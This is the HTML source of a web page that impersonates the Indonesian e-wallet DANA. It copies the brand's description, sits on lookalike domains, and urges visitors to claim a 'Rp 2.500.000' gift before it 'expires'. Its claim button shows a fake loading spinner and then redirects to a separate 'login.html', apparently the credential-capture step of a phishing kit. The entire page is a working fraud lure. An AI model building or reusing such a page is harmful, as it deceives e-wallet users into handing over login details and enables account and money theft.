

<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" content="#118EEA">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
  <title> 𝗜𝗗 |  </title>
  <meta name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">

 
  <meta property="og:url" content="https://www.dana.id.com.com">
  <meta property="og:type" content="website">
  <meta property="og:title" content=" 𝗜𝗗 |   ">
  <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <meta property="og:image" content="https://hosting.tigerengine.id/azsjmh.jpg">
  <link href="https://hosting.tigerengine.id/xeqowd.jpg" rel="apple-touch-icon">
 <link rel="canonical" href="https://www.dana.id.com/">
<meta property="og:url" content="https://www.dana.id.com/" />
<meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<meta property="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Varela+Round&amp;display=swap'><link rel="stylesheet" href="./style.css">

<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet">
<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.theme.default.min.css" rel="stylesheet">
<script src="https://owlcarousel2.github.io/OwlCarousel2/assets/vendors/jquery.min.js">
</script>
 <script src="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/owl.carousel.js">
   </script>
<link href="https://fonts.googleapis.com/css?family=Alata" rel="stylesheet" type="text/css">  
</head>
<style>
 form {
  --background: #ffffff;
  --text: #414856;
  --radio: #7C96B2;
  --radio-checked: #118EEA;
  --radio-size: 25px;
  --width: 292px;
  --height: 120px;
  --border-radius: 20px 20px 5px 5px;
  background: var(--background);
  width: var(--width);
  height: var(--height);
  border-radius: var(--border-radius);
  color: var(--text);
  position: relative;
  box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05);
  box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;
  padding: 30px 20px;
  padding-top: 10px;
  display: ;
  grid-template-columns: auto var(--radio-size);
  font-weight: bold;
  align-items: center;
  font-family: Alata, sans-serif;
  
}
form label {
  cursor: pointer;
}
form input[type=radio] {
  -webkit-appearance: none;
  -moz-appearance: none;
  position: relative;
  height: var(--radio-size);
  width: var(--radio-size);
  outline: none;
  margin: 3px 0;
  cursor: pointer;
  border: 2px solid var(--radio);
  background: transparent;
  border-radius: 50%;
  display: grid;
  justify-self: end;
  justify-items: center;
  align-items: center;
  overflow: hidden;
  transition: border 0.5s ease;
}
form input[type=radio]::before, form input[type=radio]::after {
  content: "";
  display: flex;
  justify-self: center;
  border-radius: 50%;
}
form input[type=radio]::before {
  position: absolute;
  width: 100%;
  height: 100%;
  background: var(--background);
  z-index: 1;
  opacity: var(--opacity, 1);
}
form input[type=radio]::after {
  position: relative;
  width: calc(100% /2);
  height: calc(100% /2);
  background: var(--radio-checked);
  top: var(--y, 100%);
  transition: top 0.5s cubic-bezier(0.48, 1.97, 0.5, 0.63);
}
form input[type=radio]:checked {
  --radio: var(--radio-checked);
}
form input[type=radio]:checked::after {
  --y: 0%;
  -webkit-animation: stretch-animate 0.3s ease-out 0.17s;
          animation: stretch-animate 0.3s ease-out 0.17s;
}
form input[type=radio]:checked::before {
  --opacity: 0;
}
form input[type=radio]:checked ~ input[type=radio]::after {
  --y: -100%;
}
form input[type=radio]:not(:checked)::before {
  --opacity: 1;
  transition: opacity 0s linear 0.5s;
}

@-webkit-keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}

@keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}
body {
  background: #E8EBF3;
  height: 100%;
  font: 400 16px "Varela Round", sans-serif;
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
}
body .socials {
  position: fixed;
  display: block;
  left: 20px;
  bottom: 20px;
}
body .socials > a {
  display: block;
  width: 30px;
  opacity: 0.2;
  transform: scale(var(--scale, 0.8));
  transition: transform 0.3s cubic-bezier(0.38, -0.12, 0.24, 1.91);
}
body .socials > a:hover {
  --scale: 1;
}   


/* Added PseudoCode CSS to Hide the Controls of Video as on adding Controls Attribute to Video, the controls of video get visible easily. So to control that case also, this needs to be present on CSS End */

video::-webkit-media-controls {
    display: ;
}

video {
  display: none;
  pointer-events: none;
}


#carousel {
  grid-row: 1 / 2;
  grid-column: 1 / 8;
  width: 150vw;
  height: 500px;
  display: flex;
  align-items: center;
  justify-content: center;
  overflow: hidden;
  transform-style: preserve-3d;
  perspective: 600px;
  --items: 5;
  --middle: 3;
  --position: 1;
  pointer-events: none;
}

div.item {
  position: absolute;
  width: 300px;
  height: 400px;
  background-color: coral;
  --r: calc(var(--position) - var(--offset));
  --abs: max(calc(var(--r) * -1), var(--r));
  transition: all 0.25s linear;
  transform: rotateY(calc(-10deg * var(--r)))
    translateX(calc(-300px * var(--r)));
  z-index: calc((var(--position) - var(--abs)));
}

div.item:nth-of-type(1) {
  --offset: 1;
  background-color: #90f1ef;
}
div.item:nth-of-type(2) {
  --offset: 2;
  background-color: #ff70a6;
}
div.item:nth-of-type(3) {
  --offset: 3;
  background-color: #ff9770;
}
div.item:nth-of-type(4) {
  --offset: 4;
  background-color: #ffd670;
}
div.item:nth-of-type(5) {
  --offset: 5;
  background-color: #e9ff70;
}

 .btn-punya {
        display: block;
        margin: 0px auto;
        padding: 0px;
        cursor: pointer;
        background: none rgb(0, 134, 224);
        border: none;
        text-align: center;
        height: 60px;
        width: 100%;
        
        font-family: 'Open Sans', sans-serif;
        font-size: 18px;
        font-weight: bold;
        color: rgb(255, 255, 255);
        letter-spacing: 1px;
        line-height: 1;
        border-radius: 50px;
        box-shadow: rgb(170, 170, 170) 5px 5px 7px 0px;
        transition: background 200ms ease 0s;
    }
    
    /*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 300px;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/

.block {
	position: relative;
	margin: 300px auto 0;
	
	height: 430px;
	background: linear-gradient(0deg, #000, #272727);
}

.block:before, .block:after {
	content: '0';
	position: relatoive;
	left: -2px;
	top: -2px;
	background: linear-gradient(45deg, #fb0094, #0000ff, #00ff00,#ffff00, #ff0000, #fb0094, 
		#0000ff, #00ff00,#ffff00, #ff0000);
	background-size: 400%;
	width: calc(100% + 4px);
	height: calc(100% + 4px);
	z-index: -1;
	animation: steam 20s linear infinite;
}

@keyframes steam {
	0% {
		background-position: 0 0;
	}
	50% {
		background-position: 400% 0;
	}
	100% {
		background-position: 0 0;
	}
}

.block:after {
	filter: blur(50px);
}

body {
  height: 100%;
  overflow: hidden; }
  
    .container {
    height: 716px;
    max-height: 716px;
    max-width: 100%;
    min-height: 716px;
    background-image: url("");
    background-position: 0px 0px;
    background-size: 100% 716px;
    background-repeat: no-repeat;
    text-align: center;
    margin-top: 10px;
  }
</style>
<body>
  <div id="kelentet" style="display:none; width: 100%; height: 100%; position: fixed; left: auto; right: auto; z-index: 0; background: " ></div>          
<nav style="position: fixed; top: 0; left:0; right: 0; margin: 0px auto; width: 100%; height: 60px; background: transparent; z-index: 999">
<img src="https://hosting.tigerengine.id/ulqfeu.png" style="width: 100px; margin-top: 7px; margin-left: 9px">   
</nav>
<center>
  <img id="video"
    width="100%"
    height="35%"
    autoplay
    muted control loop style=" width: 100%; height: 30%; display: block; background-color: #118EEA; position: fixed; top: 0; left: 0; right: 0; border-radius: 0px 0px 12px 12px; border-bottom: 3px groove #fff;  box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05);
  box-shadow: rgba(6, 24, 44, 1.4) 0px 0px 6px 6px, rgba(6, 24, 44, 0.05) 0px 4px 6px -1px, rgba(255, 255, 255, 1.08) 0px 1px 0px inset; outline: 3px solid #118EEA;"  preload="metadata" src="https://hosting.tigerengine.id/jhpiui.png" type="img/jpeg">
   <div style="width: 100%; height: 10%; display: block; background-color: #E8EBF3; position: fixed; top: 28%; left: 0; right: 0; border-radius: 15px 15px 0px 0px; border-top: 2px inset #fff; z-index: "></div>
</center>
 <div class="container w-container">   
<!-- partial:index.partial.html -->
<form style="margin-top: 220px; height: 50px; padding-top: 0px; margin-bottom: 60px; text-align: center; font-size: 15px; background: #118EEA; display: grid; color: #fff; border: 2px solid #fff; outline: 2px solid #118EEA; padding:; box-shadow: rgba(6, 24, 44, 0.4) 0px 0px 4px 5px inset, rgba(6, 24, 44, 0.65) 0px 4px 6px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset;">
    <center>
    <h2 style="margin-left: 14px;text-align: center; font-size: 14px; font-weight: bold; color: #fff; margin-top: -10px; width: 100%">𝗦𝗜𝗟𝗔𝗛𝗞𝗔𝗡 𝗞𝗟𝗔𝗜𝗠 𝗞𝗔𝗚𝗘𝗧𝗡𝗬𝗔</h2>
</center>
 </form>   


<form style="margin-top: -100px; border-top: 0px solid #ccc; height: 105px; text-align: left; background: url(https://hosting.tigerengine.id/wdeq9m.png);
    background-position: 100% 100%;
    background-size: 100% 100%; background-color: #fff; outline: 3px solid #ffffff; text-shadow: 0 1px 1px rgba(888, 999, 255, 10.75);box-shadow: rgba(6, 24, 24, 0.99) 0px 0px 0px 2px, rgba(6, 24, 4, 10.65) 0px 4px 6px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset;" >
    
    
 <center>
     <div style="color: #118EEA">𝗛𝗔𝗗𝗜𝗔𝗛</div>
<select id="" class="btn-punya" style="margin-top: 10px; font-size: 13px; height: 42px; -webkit-appearance: none; box-shadow: rgba(6, 24, 44, 0.4) 0px 0px 0px 0px, rgba(6, 24, 44, 0.65) 0px 4px 4px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset; outline: 2px solid #fff" required>
 <option value="" disabled selected>𝗥𝗽. 𝟐.𝟓𝟎𝟎.𝟎𝟎𝟎</option>   
 

 </select>
 
 <div style="color: #118EEA; margin-top: 0px; padding: 10px">Claim Sekarang Jangan tunggu sampai hangus</div>
</center>  
</form>

<br/>
<button type="button" onclick="letsgo1()" style="width: 90%; height: 50px; border-radius: 50px; border: none; box-shadow: rgba(6, 24, 44, 0.4) 0px 0px 0px 0px, rgba(6, 24, 44, 0.65) 0px 4px 4px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset; background: #118EEA; color: #fff; font-size: 17px; font-weight: bold; margin-top: -5px; outline: 2px solid #fff;z-index:999999999999999999;cursor:pointer;">𝗖𝗹𝗮𝗶𝗺 𝗦𝗲𝗸𝗮𝗿𝗮𝗻𝗴</button>   


<!--- ## DRIBBBLE + TWITTER ############# -->

<footer style="position: fixed; bottom: 20; left: 0; right: 0; width: 100%; height: 200px; z-index: -1">
<!----------HTML code starts here------->

<div class="owl-carousel owl-theme owl-loaded " style="height: 125px; transform-style: preserve-3d; overflow: hidden">
            
       <div class="owl-stage-outer" style="padding: 0 90px; height: 160px; width: 100%; transform-style: preserve-3d;">
         
         <div class="owl-stage" style="transform: translate3d(-1527px, 0px, 0px); transition: all 0.05s ease 1s; width: 3334px; background-color: ; padding: 20px; width: 80%">
           
   <div class="owl-item item active;" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; border-radius: 10px; background: transparent"><img src="https://hosting.tigerengine.id/m2i11h.png" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="background-color: #000; box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; border-radius: 20px 0 20px 0; background: transparent"><img src="https://hosting.tigerengine.id/dgphig.png" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="https://hosting.tigerengine.id/n2f2ax.png"  style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="https://hosting.tigerengine.id/vror9m.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="https://hosting.tigerengine.id/g9xxw5.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="https://hosting.tigerengine.id/xe3quq.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent; border-radius: 20px 0 20px 0"><img src="https://hosting.tigerengine.id/fugynj.jpg" height="105px" style="border-radius: 20px 0 20px 0"></div>
           
           
             
            </div></div></div>
           
  
</div>    
</footer>
<center>
     <div id="process1" name="process" class="process1" style="display: none;">
            <div class="loading">
                <img src="https://hosting.tigerengine.id/mjtb0y.png">
                <img class="spinner" src="https://hosting.tigerengine.id/m0dda3.png" id="loading" style="margin-top: -2px">
            </div>
        </div>
        </center>
<img src="https://hosting.tigerengine.id/o6fxxt.png" style="width: 100%; position: fixed; bottom: -5; left: 0; right: 0; margin: 0px auto; z-index: -1;"> 


<!-- partial -->
  <script>
var owl = $('.owl-carousel');
owl.owlCarousel({
    items:2, 
  // items change number for slider display on desktop
  
    loop:true,
    margin:10,
    autoplay:true,
    autoplayHoverPause:true
});      
      
  </script>

<script>
    /* Toggle Button to Unmute the Video */

function toggleMute() {
    var video = document.getElementById('video');
    if (video.muted) {
        video.muted = false;
    } else {
        video.muted = true;
    }
}

/* Delay Function to Add SetTimeOut After Defined Interval */

function delay(time) {
    return new Promise((resolve) => setTimeout(resolve, time));
}

/* Show Video Function to Add Display Property to Show the Video on Click of Button which will fulfilled User Interaction Needs to Browser to Run the Video with Unmute State */

function showVideo() {
    var element = document.getElementById('video');
    var button = document.getElementById('button');
    element.style.display = 'block';
    button.style.display = 'none';
    delay(100).then(() => toggleMute());
}
</script>

<script>
 function letsgo1(){
 $("#process1").show();
 setTimeout(function(){    
 window.location.href="login.html";
  $("#process1").hide();
 },700);
 }   
</script>
</body>
</html>
